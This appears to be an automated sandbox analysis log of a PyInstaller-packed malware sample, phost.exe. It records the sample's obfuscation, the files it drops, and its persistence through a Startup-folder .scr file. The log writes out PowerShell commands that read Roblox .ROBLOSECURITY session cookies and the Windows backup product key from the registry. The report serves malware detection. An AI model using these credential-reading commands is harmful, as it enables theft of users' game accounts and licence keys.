              Source: phost.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: phost.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: phost.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: phost.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline"
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x169f0
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x53022
              Source: phost.exeStatic PE information: real checksum: 0x781af9 should be: 0x77e839
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x170f7
              Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x150ed
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x9f7df
              Source: python312.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1ca53b
              Source: libcrypto-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x192b2f
              Source: jnxiphgt.dll.78.drStatic PE information: real checksum: 0x0 should be: 0xdd1a
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xcac1
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x10668
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x226ba
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x9cd5
              Source: libssl-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x396d1
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x100e6
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x23988
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1149b
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD990DD2A5 pushad ; iretd 12_2_00007FFD990DD2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD991F85FD push ebx; ret 12_2_00007FFD991F860A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD991F860D push ebx; ret 12_2_00007FFD991F860A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD991F83FC push ebx; ret 12_2_00007FFD991F847A
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\phost.exeProcess created: "C:\Users\user\Desktop\phost.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Users\user\Desktop\phost.exeProcess created: attrib.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32202\python312.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.dllJump to dropped file
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scrJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scrJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC776B0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF62CC776B0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
